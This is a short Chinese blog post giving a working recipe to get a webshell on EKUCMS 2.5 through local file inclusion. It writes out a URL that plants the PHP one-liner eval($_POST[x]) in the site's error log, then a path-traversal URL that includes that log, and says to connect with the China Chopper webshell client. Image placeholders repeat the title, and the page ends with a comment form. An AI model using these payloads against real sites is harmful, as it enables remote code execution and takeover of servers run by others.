易酷cms本地包含漏洞拿shell

  • A+
所属分类:颓废's Blog
摘要

包含一句话:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])} 会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日

测试版本:易酷cms2.5

包含一句话:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])}

易酷cms本地包含漏洞拿shell

会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日

易酷cms本地包含漏洞拿shell

错误日志内容

易酷cms本地包含漏洞拿shell

包含错误日志,地址:http://localhost/ekucms2.5/?s=my/show/id//../temp/logs/17_12_02.log

易酷cms本地包含漏洞拿shell

直接用菜刀连接

易酷cms本地包含漏洞拿shell

成功

易酷cms本地包含漏洞拿shell

查看原文

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: